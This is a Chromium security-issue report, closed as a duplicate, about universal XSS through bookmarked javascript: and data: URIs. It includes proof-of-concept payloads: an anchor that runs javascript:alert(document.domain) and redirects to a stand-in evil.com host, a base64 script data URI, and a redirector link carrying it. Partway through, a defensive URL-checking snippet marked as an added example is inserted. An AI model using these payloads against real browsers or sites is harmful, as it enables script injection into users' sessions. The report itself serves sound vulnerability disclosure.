Issue 705202 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 657380
Owner: ----
Closed: Mar 2017
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security




UXSS through Bookmark + Data Scheme URI

Reported by anasmahm...@gmail.com, Mar 25 2017

Issue description

UserAgent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0

Steps to reproduce the problem:
1. The victim clicks a malicious link

   <a href="javascript:alert(document.domain)" onclick="document.location.href='http://www.evil.com'">http://www.evil.com</a>

2. If the user clicks this link, the browser loads evil.com; if the user bookmarks the link, the payload will be bookmarked.

3. The user bookmarks the link by simply dragging and dropping it onto the Bookmarks Toolbar in the header above.

4. If the user then clicks on the bookmark, the injected javascript from Step 1 will be executed in the context of whichever domain is currently loaded in the active tab.

It can also be exploited through a Data URI: "data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"

The Data URI scheme executes script using ‘text/html’, which makes the browser render it as a webpage.

A hacker or attacker can perform several types of malware attack by taking advantage of the Data URI scheme, which could result in Universal XSS, open redirection, spoofing and others.

http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3D%3D&t=NWI3MzFjMDEzYmI5ZTQzMjJlNzhmOTNhYjJkMWQ1ZTYyMzVlYjAyNiw5OXlxQ2FuOQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158706726327%2Fpoc-click-me-poc-click-me&m=1


What is the expected behavior?
Bookmark should not allow Javascript and Data URIs to be saved.

What went wrong?
Bookmark allows Javascript and Data URIs to be saved.

Did this work before? N/A 

Chrome version:  57.0.2935.0  Channel: n/a
OS Version: Windows 7
Flash Version: Shockwave Flash 10.2 r159

This is just a simple payload:

<a href="javascript:alert(document.domain)" onclick="document.location.href='http://www.evil.com'">http://www.evil.com</a>

We can modify the payload by disabling the alert popup, but if we bookmark this, the original payload will be bookmarked; this is just a demo because we can't make a popup box when attacking.
 
VERSION
Chrome Version: 55,56,57

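The expected behaviour above is that javascript: and data: URLs are refused before they are stored as bookmarks. The following is an added example, not code from this report or from Chromium: a defender-side check for an application that stores user-supplied bookmark URLs, assuming an http/https allow-list and a hypothetical redirector whose target lives in a query parameter (as in the t.umblr.com links in the report). It parses the way a browser does, so spellings that hide the scheme behind tabs, newlines or mixed case are still caught.

```javascript
// Added example (not from the Chromium report): refuse javascript: and
// data: URLs before they are saved as bookmarks or followed by a redirector.
// Assumption: only http(s) bookmarks are legitimate for this application.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// The WHATWG URL parser (what browsers use) strips leading/trailing C0
// controls and spaces, removes ASCII tab/newline anywhere in the input and
// lower-cases the scheme. Checking the raw string with a regex would miss
// inputs such as "\tJaVaScRiPt:" or "java\nscript:"; parsing does not.
function parseLikeBrowser(raw) {
  try {
    return new URL(String(raw));
  } catch (_) {
    return null; // relative or malformed input: no scheme to trust
  }
}

// Decide whether `raw` may be stored as a bookmark.
// Returns { allowed, scheme, reason } so callers can log the refusal.
function classifyBookmarkUrl(raw) {
  const url = parseLikeBrowser(raw);
  if (url === null) {
    return { allowed: false, scheme: null, reason: "unparseable" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {
    return { allowed: false, scheme: url.protocol, reason: "scheme not allowed" };
  }
  return { allowed: true, scheme: url.protocol, reason: "ok" };
}

// A redirector must apply the same allow-list to its decoded target, or it
// becomes a delivery path for data: payloads. `param` is the query key that
// carries the destination (hypothetical; "z" in the report's links).
function classifyRedirectTarget(redirectUrl, param) {
  const outer = parseLikeBrowser(redirectUrl);
  if (outer === null) {
    return { allowed: false, scheme: null, reason: "unparseable" };
  }
  const target = outer.searchParams.get(param); // already percent-decoded
  if (target === null) {
    return { allowed: false, scheme: null, reason: "missing target" };
  }
  return classifyBookmarkUrl(target);
}
```

The check is applied at save time and again at redirect time; a bookmark that passed when it was stored cannot later be rewritten into a different scheme without being re-checked.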
Mergedinto: 657380
Status: Duplicate (was: Unconfirmed)
Hey, I didn't see report 657380 before submitting this issue, but now I see it. It looks like the same report as mine, but it's not actually the same; I clearly describe the exploit. Bookmark not only allows the javascript protocol to be saved, but it also allows data URIs to be saved. It's more harmful!

The browser releases a new version if the vulnerability exists in the version, or makes an update.

Report 657380 is about Chrome version 54, but my report shows Chrome version 57 (latest).
Project Member

Comment 4 by sheriffbot@chromium.org, Aug 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
